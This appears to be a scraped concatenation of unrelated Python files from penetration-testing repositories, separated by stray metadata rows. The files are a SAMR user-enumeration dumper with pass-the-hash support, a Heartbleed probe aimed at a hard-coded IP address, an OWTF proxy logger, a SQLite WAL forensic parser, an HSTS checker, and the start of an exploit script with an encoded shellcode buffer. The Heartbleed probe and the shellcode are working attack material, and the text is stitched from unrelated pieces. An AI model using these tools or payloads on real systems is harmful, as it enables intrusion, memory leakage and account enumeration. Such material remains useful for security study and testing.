# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# $Id: samrdump.py 592 2012-07-11 16:45:20Z bethus@gmail.com $
#
# Description: DCE/RPC SAMR dumper.
#
# Author:
# Javier Kohen <jkohen@coresecurity.com>
# Alberto Solino <bethus@gmail.com>
#
# Reference for:
# DCE/RPC for SAMR
import socket
import string
import sys
import types
from impacket import uuid, version
from impacket.dcerpc import dcerpc_v4, dcerpc, transport, samr
import argparse
class ListUsersException(Exception):
    """Raised when a SAMR enumeration step returns a non-zero status."""
class SAMRDump:
    # Candidate transports: the \samr named pipe over SMB (NetBIOS 139 or
    # direct-hosted 445).
    KNOWN_PROTOCOLS = {
        '139/SMB': (r'ncacn_np:%s[\pipe\samr]', 139),
        '445/SMB': (r'ncacn_np:%s[\pipe\samr]', 445),
        }
    def __init__(self, protocols = None,
                 username = '', password = '', domain = '', hashes = None):
        # NOTE(review): `protocols` is wrapped in a one-element list, so the
        # default (all KNOWN_PROTOCOLS keys) would be iterated as a single
        # non-string item and fail the dict lookup in dump(); the __main__
        # block always passes a single protocol string -- confirm before
        # calling with the default.
        if not protocols:
            protocols = SAMRDump.KNOWN_PROTOCOLS.keys()
        self.__username = username
        self.__password = password
        self.__domain = domain
        self.__protocols = [protocols]
        # Pass-the-hash support: "LMHASH:NTHASH" is split into its halves.
        self.__lmhash = ''
        self.__nthash = ''
        if hashes is not None:
            self.__lmhash, self.__nthash = hashes.split(':')
    def dump(self, addr):
        """Dumps the list of users and shares registered present at
        addr. Addr is a valid host name or IP address.
        """
        encoding = sys.getdefaultencoding()
        print 'Retrieving endpoint list from %s' % addr
        # Try all requested protocols until one works.
        entries = []
        for protocol in self.__protocols:
            protodef = SAMRDump.KNOWN_PROTOCOLS[protocol]
            port = protodef[1]
            print "Trying protocol %s..." % protocol
            rpctransport = transport.SMBTransport(addr, port, r'\samr', self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)
            try:
                entries = self.__fetchList(rpctransport)
            except Exception, e:
                print 'Protocol failed: %s' % e
                raise
            else:
                # Got a response. No need for further iterations.
                break
        # Display results.
        for entry in entries:
            (username, uid, user) = entry
            base = "%s (%d)" % (username, uid)
            print base + '/Enabled:', ('false', 'true')[user.is_enabled()]
            print base + '/Last Logon:', user.get_logon_time()
            print base + '/Last Logoff:', user.get_logoff_time()
            print base + '/Kickoff:', user.get_kickoff_time()
            print base + '/Last PWD Set:', user.get_pwd_last_set()
            print base + '/PWD Can Change:', user.get_pwd_can_change()
            print base + '/PWD Must Change:', user.get_pwd_must_change()
            print base + '/Group id: %d' % user.get_group_id()
            print base + '/Bad pwd count: %d' % user.get_bad_pwd_count()
            print base + '/Logon count: %d' % user.get_logon_count()
            items = user.get_items()
            for i in samr.MSRPCUserInfo.ITEMS.keys():
                name = items[samr.MSRPCUserInfo.ITEMS[i]].get_name()
                name = name.encode(encoding, 'replace')
                print base + '/' + i + ':', name
        if entries:
            num = len(entries)
            if 1 == num:
                print 'Received one entry.'
            else:
                print 'Received %d entries.' % num
        else:
            print 'No entries received.'
    def __fetchList(self, rpctransport):
        # Bind to the SAMR interface and walk: connect -> enumdomains ->
        # lookupdomain -> opendomain -> enumusers -> per-user queryuserinfo.
        dce = dcerpc.DCERPC_v5(rpctransport)
        encoding = sys.getdefaultencoding()
        entries = []
        dce.connect()
        dce.bind(samr.MSRPC_UUID_SAMR)
        rpcsamr = samr.DCERPCSamr(dce)
        try:
            resp = rpcsamr.connect()
            if resp.get_return_code() != 0:
                raise ListUsersException, 'Connect error'
            _context_handle = resp.get_context_handle()
            resp = rpcsamr.enumdomains(_context_handle)
            if resp.get_return_code() != 0:
                raise ListUsersException, 'EnumDomain error'
            domains = resp.get_domains().elements()
            print 'Found domain(s):'
            for i in range(0, resp.get_entries_num()):
                print " . %s" % domains[i].get_name()
            # Only the first enumerated domain is dumped.
            print "Looking up users in domain %s" % domains[0].get_name()
            resp = rpcsamr.lookupdomain(_context_handle, domains[0])
            if resp.get_return_code() != 0:
                raise ListUsersException, 'LookupDomain error'
            resp = rpcsamr.opendomain(_context_handle, resp.get_domain_sid())
            if resp.get_return_code() != 0:
                raise ListUsersException, 'OpenDomain error'
            domain_context_handle = resp.get_context_handle()
            resp = rpcsamr.enumusers(domain_context_handle)
            # 0x105 (STATUS_MORE_ENTRIES): the enumeration is paged, not an error.
            if resp.get_return_code() != 0 and resp.get_return_code() != 0x105:
                raise ListUsersException, 'OpenDomainUsers error'
            done = False
            while done is False:
                for user in resp.get_users().elements():
                    uname = user.get_name().encode(encoding, 'replace')
                    uid = user.get_id()
                    r = rpcsamr.openuser(domain_context_handle, uid)
                    print "Found user: %s, uid = %d" % (uname, uid)
                    if r.get_return_code() == 0:
                        info = rpcsamr.queryuserinfo(r.get_context_handle()).get_user_info()
                        entry = (uname, uid, info)
                        entries.append(entry)
                        c = rpcsamr.closerequest(r.get_context_handle())
                # Do we have more users?
                if resp.get_return_code() == 0x105:
                    resp = rpcsamr.enumusers(domain_context_handle, resp.get_resume_handle())
                else:
                    done = True
        except ListUsersException, e:
            print "Error listing users: %s" % e
        dce.disconnect()
        return entries
# Process command-line arguments.
if __name__ == '__main__':
    print version.BANNER
    parser = argparse.ArgumentParser()
    parser.add_argument('target', action='store', help='[domain/][username[:password]@]<address>')
    parser.add_argument('protocol', choices=SAMRDump.KNOWN_PROTOCOLS.keys(), nargs='?', default='445/SMB', help='transport protocol (default 445/SMB)')
    group = parser.add_argument_group('authentication')
    group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
    if len(sys.argv)==1:
        parser.print_help()
        sys.exit(1)
    options = parser.parse_args()
    import re
    # Split target into domain/username[:password]@address; every component
    # except the address is optional ('' when absent).
    domain, username, password, address = re.compile('(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))?@)?(.*)').match(options.target).groups('')
    if domain is None:
        domain = ''
    dumper = SAMRDump(options.protocol, username, password, domain, options.hashes)
    dumper.dump(address)
| 33.596154 | 151 | 0.560806 |
PenetrationTestingScripts | #!/usr/bin/python
import sys
import struct
import socket
import select
import time
import threading
from printers import printPink,printRed
from multiprocessing.dummy import Pool
class ssl_burp(object):
def __init__(self,c):
self.config=c
self.lock=threading.Lock()
self.result=[]
self.hello = self.h2bin('''
16 03 02 00 dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
00 0f 00 01 01
''')
self.hb = self.h2bin('''
18 03 02 00 03
01 40 00
''')
def h2bin(self,x):
return x.replace(' ', '').replace('\n', '').decode('hex')
def recvall(self,s, length, timeout=8):
endtime = time.time() + timeout
rdata = ''
remain = length
while remain > 0:
rtime = endtime - time.time()
if rtime < 0:
return None
r, w, e = select.select([s], [], [], 5)
if s in r:
data = s.recv(remain)
# EOF?
if not data:
return None
rdata += data
remain -= len(data)
return rdata
def recvmsg(self,s):
hdr = self.recvall(s, 5)
if hdr is None:
return None, None, None
typ, ver, ln = struct.unpack('>BHH', hdr)
pay = self.recvall(s, ln, 10)
return typ, ver, pay
def hit_hb(self,s,ip,port):
s.send(self.hb)
while True:
typ, ver, pay = self.recvmsg(s)
if typ is None:
return False
if typ == 24:
if len(pay) > 3:
self.lock.acquire()
printRed('WARNING: %s ssl at %s returned more data than it should - server is vulnerable!\r\n' %(ip,port))
self.result.append('WARNING: %s ssl at %s returned more data than it should - server is vulnerable!\r\n' %(ip,port))
self.lock.release()
else:
self.lock.acquire()
printRed('%s ssl at %s processed malformed heartbeat, but did not return any extra data.\r\n' %(ip,port))
self.result.append('%s ssl at %s processed malformed heartbeat, but did not return any extra data.\r\n' %(ip,port))
self.lock.release()
return True
if typ == 21:
return False
def openssl_test(self,ip,port):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sys.stdout.flush()
s.connect((ip, port))
sys.stdout.flush()
s.send(self.hello)
sys.stdout.flush()
while True:
typ, ver, pay = self.recvmsg(s)
if typ == None:
break
# Look for server hello done message.
if typ == 22 and ord(pay[0]) == 0x0E:
break
sys.stdout.flush()
s.send(self.hb)
self.hit_hb(s,ip,port)
except Exception,e:
#print e
pass
    def run(self,ipdict,pinglist,threads,file):
        """Fan the Heartbleed probe out over every host:port in ipdict['ssl'].

        Uses a thread pool of `threads` workers; collected findings from
        self.result are appended to `file` when all probes finish.
        (`pinglist` is accepted for interface parity with the other crackers
        but is not used here.)
        """
        if len(ipdict['ssl']):
            printPink("crack ssl now...")
            print "[*] start test openssl_heart  %s" % time.ctime()
            starttime=time.time()
            pool=Pool(threads)
            for ip in ipdict['ssl']:
                # Entries are "host:port" strings; split into args for the probe.
                pool.apply_async(func=self.openssl_test,args=(str(ip).split(':')[0],int(str(ip).split(':')[1])))
            pool.close()
            pool.join()
            print "[*] stop ssl serice  %s" % time.ctime()
            print "[*] crack ssl done,it has Elapsed time:%s " % (time.time()-starttime)
            for i in xrange(len(self.result)):
                self.config.write_file(contents=self.result[i],file=file)
if __name__ == '__main__':
    # Ad-hoc smoke test: probe a single hard-coded host:port for Heartbleed
    # and write any findings to ../result/test.
    import sys
    sys.path.append("../")
    from comm.config import *
    c=config()
    ipdict={'ssl': ['222.22.224.142:443']}
    pinglist=['122.225.81.129']
    test=ssl_burp(c)
    test.run(ipdict,pinglist,50,file="../result/test")
| 32.773973 | 136 | 0.495943 |
owtf | """
owtf.transactions.main
~~~~~~~~~~~~~~~~~~~~~~
Inbound Proxy Module developed by Bharadwaj Machiraju (blog.tunnelshade.in) as a part of Google Summer of Code 2013
"""
import glob
import logging
import os
import time
try: # PY3
from urllib.parse import urlparse
except ImportError: # PY2
from urlparse import urlparse
from owtf.transactions.base import HTTPTransaction
from owtf.lib.owtf_process import OWTFProcess
from owtf.models.target import Target
from owtf.managers.target import get_all_in_scope, target_manager
from owtf.managers.transaction import log_transactions_from_logger
from owtf.proxy.cache_handler import request_from_cache, response_from_cache
from owtf.settings import INBOUND_PROXY_CACHE_DIR
from owtf.utils.timer import Timer
class TransactionLogger(OWTFProcess):
    """
    This transaction logging process is started separately from tornado proxy
    This logger checks for \*.rd files in cache_dir and saves it as owtf db
    transaction, \*.rd files serve as a message that the file corresponding
    to the hash is ready to be converted.
    """
    def initialize(self, **kwargs):
        # Runs in the child process: suppress console output, keep file logging.
        self.logger.disable_console_logging()
    def derive_target_for_transaction(self, request, response, target_list, host_list):
        """Get the target and target ID for transaction
        :param request: Proxy request
        :type request:
        :param response: Proxy response
        :type response:
        :param target_list: The target list for the transaction
        :type target_list: `list`
        :param host_list: The list of hosts for the transaction
        :type host_list: `list`
        :return: [target_id, in_scope_flag]
        :rtype: `list`
        """
        for target_id, target in target_list:
            if request.url.startswith(target):
                return [target_id, True]
            elif target in request.url:
                return [target_id, self.get_scope_for_url(request.url, host_list)]
            elif response.headers.get("Referer", None) and response.headers["Referer"].startswith(target):
                return [target_id, self.get_scope_for_url(request.url, host_list)]
            # This check must be at the last
            elif urlparse(request.url).hostname == urlparse(target).hostname:
                return [target_id, True]
        # NOTE(review): get_target_id is referenced without parentheses -- confirm
        # it is a property on target_manager; otherwise a bound method is returned.
        return [target_manager.get_target_id, self.get_scope_for_url(request.url, host_list)]
    def get_scope_for_url(self, url, host_list):
        """Check the scope for the url in the transaction
        :param url: URL to inspect
        :type url: `str`
        :param host_list: The list of hosts associated
        :type host_list: `list`
        :return: True if in scope, else False
        :rtype: `bool`
        """
        return urlparse(url).hostname in host_list
    def get_owtf_transactions(self, hash_list):
        """Get the proxy transactions from the cache
        :param hash_list: The hash list to fetch from cache
        :type hash_list: `list`
        :return: A dictionary of all requested transactions, keyed by target id
        :rtype: `dict`
        """
        transactions_dict = None
        target_list = Target.get_indexed(self.session)
        if target_list: # If there are no targets in db, where are we going to add. OMG
            transactions_dict = {}
            host_list = get_all_in_scope("host_name")
            for request_hash in hash_list:
                request = request_from_cache(os.path.join(INBOUND_PROXY_CACHE_DIR, request_hash))
                response = response_from_cache(os.path.join(INBOUND_PROXY_CACHE_DIR, request_hash))
                target_id, request.in_scope = self.derive_target_for_transaction(
                    request, response, target_list, host_list
                )
                owtf_transaction = HTTPTransaction(Timer())
                owtf_transaction.import_proxy_req_resp(request, response)
                # Group transactions per target; first hit creates the list.
                try:
                    transactions_dict[target_id].append(owtf_transaction)
                except KeyError:
                    transactions_dict[target_id] = [owtf_transaction]
        return transactions_dict
    def get_hash_list(self, cache_dir):
        """Returns the hash list from cache directory
        :param cache_dir: The path to the cache directory
        :type cache_dir: `str`
        :return: List of hashes
        :rtype: `list`
        """
        hash_list = []
        for file_path in glob.glob(os.path.join(cache_dir, "*.rd")):
            request_hash = os.path.basename(file_path)[:-3]
            hash_list.append(request_hash)
            # The .rd marker is consumed here so the same hash is not re-processed.
            os.remove(file_path)
        return hash_list
    def pseudo_run(self):
        """The run function which fetches the transactions from the cache asynchronously
        :return: None
        :rtype: None
        """
        try:
            # Poll until the parent signals shutdown through the poison queue.
            while self.poison_q.empty():
                if glob.glob(os.path.join(INBOUND_PROXY_CACHE_DIR, "*.rd")):
                    hash_list = self.get_hash_list(INBOUND_PROXY_CACHE_DIR)
                    transactions_dict = self.get_owtf_transactions(hash_list)
                    if transactions_dict:  # Make sure you do not have None
                        log_transactions_from_logger(transactions_dict)
                else:
                    time.sleep(2)
        except KeyboardInterrupt:
            exit(-1)
def start_transaction_logger():
    """Create, initialize and launch the TransactionLogger child process.

    Best-effort by design: the proxy can operate without the logger, so any
    startup failure is recorded (with traceback) instead of propagated.
    """
    try:
        transaction_logger = TransactionLogger(cache_dir=INBOUND_PROXY_CACHE_DIR)
        transaction_logger.initialize()
        logging.debug("Starting transaction logger process")
        transaction_logger.start()
    except Exception as exc:
        # Keep the traceback: `str(exc)` alone made failures undiagnosable.
        logging.debug("Transaction logger failed to start: %s", str(exc), exc_info=True)
| 37.80137 | 115 | 0.623588 |
cybersecurity-penetration-testing | import binascii
import logging
import os
import re
import struct
from collections import namedtuple
__author__ = 'Preston Miller & Chapin Bryce'
__date__ = '20160401'
__version__ = 0.01
__description__ = '''This scripts processes SQLite "Write Ahead Logs" and extracts database entries that may
contain deleted records or records that have not yet been added to the main database.'''
def main(wal_file, **kwargs):
    """
    The main function parses the header of the input file and identifies the WAL file. It then splits the file into
    the appropriate frames and send them for processing. After processing, if applicable, the regular expression
    modules are ran. Finally the raw data output is written to a CSV file.
    :param wal_file: Wal File to parse
    :return: Tuple of (results, headers): one dict per recovered cell plus the
        CSV column names. Raises TypeError on a short header or bad magic.
    """
    wal_attributes = {'size': os.path.getsize(wal_file), 'header': {}, 'frames': {}}
    with open(wal_file, 'rb') as wal:
        # Parse 32-byte WAL header.
        header = wal.read(32)
        # If file is less than 32 bytes long: exit wal_crawler.
        try:
            wal_attributes['header'] = dictHelper(header, '>4s7i', namedtuple('struct',
                                                                              'magic format pagesize checkpoint '
                                                                              'salt1 salt2 checksum1 checksum2'))
        except struct.error, e:
            logging.error('STRUCT ERROR for {}:{}'.format(wal_file, e.message))
            raise TypeError
        # Do not proceed in the program if the input file is not a WAL file.
        magic_hex = binascii.hexlify(wal_attributes['header']['magic'])
        if magic_hex != "377f0682" and magic_hex != "377f0683":
            logging.error('Magic mismatch, expected 0x377f0682 or 0x377f0683 | received {} from {}'.format(
                magic_hex, wal_file))
            print '[-] File {} does not have appropriate signature for WAL file. Exiting...'.format(wal_file)
            raise TypeError
        # Calculate number of frames: each frame is a 24-byte header + one page.
        frames = (wal_attributes['size'] - 32) / (wal_attributes['header']['pagesize'] + 24)
        # Parse frames in WAL file. Create progress bar using trange(frames) which is an alias for tqdm(xrange(frames)).
        for x in xrange(frames):
            # Parse 24-byte WAL frame header.
            wal_attributes['frames'][x] = {}
            frame_header = wal.read(24)
            wal_attributes['frames'][x]['header'] = dictHelper(frame_header, '>6i', namedtuple('struct',
                                                                                               'pagenumber commit salt1'
                                                                                               ' salt2 checksum1'
                                                                                               ' checksum2'))
            # Parse pagesize WAL frame if B-Tree table-leaf (0x0d).
            frame = wal.read(wal_attributes['header']['pagesize'])
            if binascii.hexlify(frame[0:1]) == '0d':
                frameParser(wal_attributes, x, frame)
            else:
                # Non-leaf page: mark the frame as cell-less and move on.
                wal_attributes['frames'][x]['cells'] = None
                continue
    # Write WAL data to CSV file.
    headers = ['File', 'Frame', 'Salt-1', 'Salt-2', 'Frame Offset', 'Cell', 'Cell Offset', 'ROWID', 'Data']
    results = []
    for frame in wal_attributes['frames']:
        if wal_attributes['frames'][frame]['cells'] is not None:
            for cell in wal_attributes['frames'][frame]['cells']:
                # Only emit cells that were fully parsed and carry data.
                if 'data' in wal_attributes['frames'][frame]['cells'][cell].keys() and len(wal_attributes['frames'][frame]['cells'][cell]['data']) > 0:
                    frame_offset = 32 + (frame * wal_attributes['header']['pagesize']) + (frame * 24)
                    cell_offset = frame_offset + 24 + wal_attributes['frames'][frame]['cells'][cell]['offset']
                    results.append({'File': wal_file, 'Frame': frame,
                                    'Salt-1': wal_attributes['frames'][frame]['header']['salt1'],
                                    'Salt-2': wal_attributes['frames'][frame]['header']['salt2'],
                                    'Frame Offset': frame_offset,
                                    'Cell': cell, 'Cell Offset': cell_offset,
                                    'ROWID': wal_attributes['frames'][frame]['cells'][cell]['rowid'],
                                    'Data': wal_attributes['frames'][frame]['cells'][cell]['data']})
    return results, headers
def frameParser(wal_dict, x, frame):
    """
    The frameParser function processes WAL frames.
    :param wal_dict: The dictionary containing parsed WAL objects.
    :param x: An integer specifying the current frame.
    :param frame: The content within the frame read from the WAL file.
    :return: Nothing. Populates wal_dict['frames'][x]['cells'] in place, or
        pops frame x entirely when it is not a table-leaf page.
    """
    # Parse 8-byte WAL page header
    page_header = frame[0:8]
    wal_dict['frames'][x]['page_header'] = dictHelper(page_header, '>b3hb', namedtuple('struct',
                                                                                       'type freeblocks cells offset'
                                                                                       ' fragments'))
    # Only want to parse 0x0D B-Tree Leaf Cells
    if wal_dict['frames'][x]['page_header']['type'] != 13:
        logging.info('Found a non-Leaf Cell in frame {}. Popping frame from dictionary'.format(x))
        wal_dict['frames'].pop(x)
        return
    # Parse offsets for "X" cells
    cells = wal_dict['frames'][x]['page_header']['cells']
    wal_dict['frames'][x]['cells'] = {}
    # The cell pointer array (2-byte big-endian offsets) starts right after
    # the 8-byte page header.
    for y in xrange(cells):
        start = 8 + (y * 2)
        wal_dict['frames'][x]['cells'][y] = {}
        wal_dict['frames'][x]['cells'][y] = dictHelper(frame[start: start + 2], '>h', namedtuple('struct', 'offset'))
        # Parse cell content
        cellParser(wal_dict, x, y, frame)
def cellParser(wal_dict, x, y, frame):
    """
    The cellParser function processes WAL cells.
    :param wal_dict: The dictionary containing parsed WAL objects.
    :param x: An integer specifying the current frame.
    :param y: An integer specifying the current cell.
    :param frame: The content within the frame read from the WAL file.
    :return: Nothing. Populates payloadlength/rowid/headerlength/types/data on
        the cell dict in place; returns early on unsupported (>=3 byte) varints.
    """
    index = 0
    # Create alias to cell_root to shorten navigating the WAL dictionary structure.
    cell_root = wal_dict['frames'][x]['cells'][y]
    cell_offset = cell_root['offset']
    # Parse the payload length and rowID Varints.
    try:
        payload_len, index_a = singleVarint(frame[cell_offset:cell_offset + 9])
        row_id, index_b = singleVarint(frame[cell_offset + index_a: cell_offset + index_a + 9])
    except ValueError:
        logging.warn('Found a potential three-byte or greater varint in cell {} from frame {}'.format(y, x))
        return
    # Update the index. Following the payload length and rowID is the 1-byte header length.
    cell_root['payloadlength'] = payload_len
    cell_root['rowid'] = row_id
    index += index_a + index_b
    cell_root['headerlength'] = struct.unpack('>b', frame[cell_offset + index: cell_offset + index + 1])[0]
    # Update the index with the 1-byte header length. Next process each Varint in "headerlength" - 1 bytes.
    index += 1
    try:
        types, index_a = multiVarint(frame[cell_offset + index:cell_offset+index+cell_root['headerlength']-1])
    except ValueError:
        logging.warn('Found a potential three-byte or greater varint in cell {} from frame {}'.format(y, x))
        return
    cell_root['types'] = types
    index += index_a
    # Immediately following the end of the Varint headers begins the actual data described by the headers.
    # Process them using the typeHelper function.
    # (Fix: a second, redundant `cell_root['types'] = types` assignment was removed here.)
    diff = cell_root['payloadlength'] - cell_root['headerlength']
    cell_root['data'] = typeHelper(cell_root['types'], frame[cell_offset + index: cell_offset + index + diff])
def dictHelper(data, format, keys):
    """
    The dictHelper function creates an OrderedDictionary from a struct tuple.
    :param data: The data to be processed with struct.
    :param format: The struct format string.
    :param keys: A string of the keys for the values in the struct tuple.
    :return: An OrderedDictionary with descriptive keys of struct-parsed values.
    """
    unpacked = struct.unpack(format, data)
    record = keys._make(unpacked)
    return keys._asdict(record)
def singleVarint(data, index=0):
    """
    Decode a single SQLite varint starting at `index` in `data`.

    Only the one- and two-byte encodings are supported; a varint that would
    need three or more bytes raises ValueError.
    :param data: The data containing the Varint.
    :param index: The current index within the data.
    :return: (value, new_index) where new_index is advanced past the varint.
    """
    first = ord(data[index:index + 1])
    if first < 128:
        # High bit clear: the varint is this single byte.
        return first, index + 1
    # High bit set: a continuation byte follows.
    second = ord(data[index + 1:index + 2])
    if second >= 128:
        # A third byte would follow; longer varints are unsupported here.
        raise ValueError
    return (first - 128) * 128 + second, index + 2
def multiVarint(data):
    """
    Decode consecutive varints until `data` is exhausted.

    :param data: The data containing the Varints.
    :return: (varints, total_width): the decoded values in order and the
        number of bytes they occupied altogether.
    """
    varints = []
    consumed = 0
    remaining = data
    # Decode one varint at a time, trimming it off the front of the buffer.
    while remaining:
        value, width = singleVarint(remaining)
        varints.append(value)
        consumed += width
        remaining = remaining[width:]
    return varints, consumed
def typeHelper(types, data):
    """
    The typeHelper function decodes the serial type of the Varints in the WAL file.
    :param types: The processed values of the Varints.
    :param data: The raw data in the cell that needs to be properly decoded via its varint values.
    :return: cell_data, a list of the processed data.
    """
    cell_data = []
    index = 0
    # Value of type dictates how the data should be processed. See serial type table in chapter
    # for list of possible values.
    for t in types:
        if t == 0:
            cell_data.append('NULL (RowId?)')
        elif t == 1:
            # 8-bit signed integer.
            try:
                cell_data.append(struct.unpack('>b', data[index:index + 1])[0])
            except struct.error:
                raise TypeError
            index += 1
        elif t == 2:
            # 16-bit big-endian signed integer.
            try:
                cell_data.append(struct.unpack('>h', data[index:index + 2])[0])
            except struct.error:
                raise TypeError
            index += 2
        elif t == 3:
            # Struct does not support 24-bit integer
            cell_data.append(int(binascii.hexlify(data[index:index + 3]), 16))
            index += 3
        elif t == 4:
            # 32-bit big-endian signed integer.
            try:
                cell_data.append(struct.unpack('>i', data[index:index + 4])[0])
            except struct.error:
                raise TypeError
            index += 4
        elif t == 5:
            # Struct does not support 48-bit integer
            cell_data.append(int(binascii.hexlify(data[index:index + 6]), 16))
            index += 6
        elif t == 6:
            # 64-bit big-endian signed integer.
            try:
                cell_data.append(struct.unpack('>q', data[index:index + 8])[0])
            except struct.error:
                raise TypeError
            index += 8
        elif t == 7:
            # 64-bit IEEE float.
            try:
                cell_data.append(struct.unpack('>d', data[index:index + 8])[0])
            except struct.error:
                raise TypeError
            index += 8
        # Type 8 == Constant 0 and Type 9 == Constant 1. Neither of these take up space in the actual data.
        elif t == 8:
            cell_data.append(0)
        elif t == 9:
            cell_data.append(1)
        # Types 10 and 11 are reserved and currently not implemented.
        elif t >= 12 and t % 2 == 0:
            # Even types >= 12 are BLOBs of (t - 12) / 2 bytes.
            # NOTE: relies on Python 2 integer division.
            b_length = (t - 12) / 2
            cell_data.append(data[index:index + b_length])
            index += b_length
        elif t >= 13 and t % 2 == 1:
            # Odd types >= 13 are text of (t - 13) / 2 bytes (Python 2 division).
            s_length = (t - 13) / 2
            cell_data.append(data[index:index + s_length])
            index += s_length
        else:
            msg = 'Unexpected serial type: {}'.format(t)
            print '[-]', msg
            logging.error(msg)
            raise TypeError
    return cell_data
def regularSearch(data, reg_exp, custom_exp):
    """
    The regularSearch function performs either default regular expression searches for personal information
    or custom searches based on a supplied regular expression string.
    :param data: The dictionary containing the parsed WAL file.
    :param reg_exp: Boolean, if True will initialize default regular expressions.
    :param custom_exp: String to use as regular expression
    :return: Nothing. Matches are printed to stdout.
    """
    regexp = {}
    if custom_exp is not None:
        regexp['Custom'] = custom_exp
    if reg_exp is not None:
        regexp['Visa Credit Card'] = r'^4\d{3}([\ \-]?)\d{4}\1\d{4}\1\d{4}$'
        regexp['SSN'] = r'^\d{3}-\d{2}-\d{4}$'
        regexp['Phone Number'] = r'^\d{3}([\ \. \-]?)\d{3}\1\d{4}$'
        regexp['URL'] = r"(http[s]?://)|(www.)(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+"
        regexp['IP Address'] = r'^\d{1,3}.\d{1,3}.\d{1,3}.\d{1,3}$'
    # Must compile each regular expression before seeing if any data "matches" it.
    # NOTE(review): the `reg_exp` parameter is re-bound to the compiled pattern
    # inside this loop; the original boolean is no longer needed at this point.
    for exp in regexp.keys():
        reg_exp = re.compile(regexp[exp])
        for frame in data['frames']:
            for cell in data['frames'][frame]['cells']:
                for datum in xrange(len(data['frames'][frame]['cells'][cell]['data'])):
                    # TypeError will occur for non-string objects such as integers.
                    try:
                        match = reg_exp.match(data['frames'][frame]['cells'][cell]['data'][datum])
                    except TypeError:
                        continue
                    # Print any successful match to user.
                    if match:
                        msg = '{}: {}'.format(exp, data['frames'][frame]['cells'][cell]['data'][datum])
                        print '[*]', msg
| 42.478006 | 151 | 0.567555 |
Hands-On-Penetration-Testing-with-Python | import requests
class Detect_HSTS():
    """Fetch a target URL and report whether it sets the HSTS header."""
    def __init__(self,target):
        # Base URL to probe, e.g. "http://host/app".
        self.target=target
    def start(self):
        """Print all response headers and flag Strict-Transport-Security."""
        try:
            resp=requests.get(self.target)
            headers=resp.headers
            print ("\n\nHeaders set are : \n" )
            # BUG FIX: .iteritems() is Python-2-only and crashed under
            # Python 3 (which the print() calls in this file target);
            # .items() behaves the same on both.
            for k,v in headers.items():
                print(k+":"+v)
            if "Strict-Transport-Security" in headers.keys():
                print("\n\nHSTS Header present")
            else:
                print("\n\nStrict-Transport-Security is missing ! ")
        except Exception as ex:
            print("EXception caught : " +str(ex))
# Module demo: probe a local DVWA instance for the HSTS header when run.
obj=Detect_HSTS("http://192.168.250.1/dvwa")
obj.start()
| 19.37037 | 56 | 0.653916 |
Penetration-Testing-with-Shellcode | #!/usr/bin/python
import socket
buf = ""
buf += "\xda\xd8\xd9\x74\x24\xf4\xba\xc2\xd2\xd2\x3c\x5e\x29"
buf += "\xc9\xb1\x53\x31\x56\x17\x83\xee\xfc\x03\x94\xc1\x30"
buf += "\xc9\xe4\x0e\x36\x32\x14\xcf\x57\xba\xf1\xfe\x57\xd8"
buf += "\x72\x50\x68\xaa\xd6\x5d\x03\xfe\xc2\xd6\x61\xd7\xe5"
buf += "\x5f\xcf\x01\xc8\x60\x7c\x71\x4b\xe3\x7f\xa6\xab\xda"
buf += "\x4f\xbb\xaa\x1b\xad\x36\xfe\xf4\xb9\xe5\xee\x71\xf7"
buf += "\x35\x85\xca\x19\x3e\x7a\x9a\x18\x6f\x2d\x90\x42\xaf"
buf += "\xcc\x75\xff\xe6\xd6\x9a\x3a\xb0\x6d\x68\xb0\x43\xa7"
buf += "\xa0\x39\xef\x86\x0c\xc8\xf1\xcf\xab\x33\x84\x39\xc8"
buf += "\xce\x9f\xfe\xb2\x14\x15\xe4\x15\xde\x8d\xc0\xa4\x33"
buf += "\x4b\x83\xab\xf8\x1f\xcb\xaf\xff\xcc\x60\xcb\x74\xf3"
buf += "\xa6\x5d\xce\xd0\x62\x05\x94\x79\x33\xe3\x7b\x85\x23"
buf += "\x4c\x23\x23\x28\x61\x30\x5e\x73\xee\xf5\x53\x8b\xee"
buf += "\x91\xe4\xf8\xdc\x3e\x5f\x96\x6c\xb6\x79\x61\x92\xed"
buf += "\x3e\xfd\x6d\x0e\x3f\xd4\xa9\x5a\x6f\x4e\x1b\xe3\xe4"
buf += "\x8e\xa4\x36\x90\x86\x03\xe9\x87\x6b\xf3\x59\x08\xc3"
buf += "\x9c\xb3\x87\x3c\xbc\xbb\x4d\x55\x55\x46\x6e\x49\x47"
buf += "\xcf\x88\x03\x97\x86\x03\xbb\x55\xfd\x9b\x5c\xa5\xd7"
buf += "\xb3\xca\xee\x31\x03\xf5\xee\x17\x23\x61\x65\x74\xf7"
buf += "\x90\x7a\x51\x5f\xc5\xed\x2f\x0e\xa4\x8c\x30\x1b\x5e"
buf += "\x2c\xa2\xc0\x9e\x3b\xdf\x5e\xc9\x6c\x11\x97\x9f\x80"
buf += "\x08\x01\xbd\x58\xcc\x6a\x05\x87\x2d\x74\x84\x4a\x09"
buf += "\x52\x96\x92\x92\xde\xc2\x4a\xc5\x88\xbc\x2c\xbf\x7a"
buf += "\x16\xe7\x6c\xd5\xfe\x7e\x5f\xe6\x78\x7f\x8a\x90\x64"
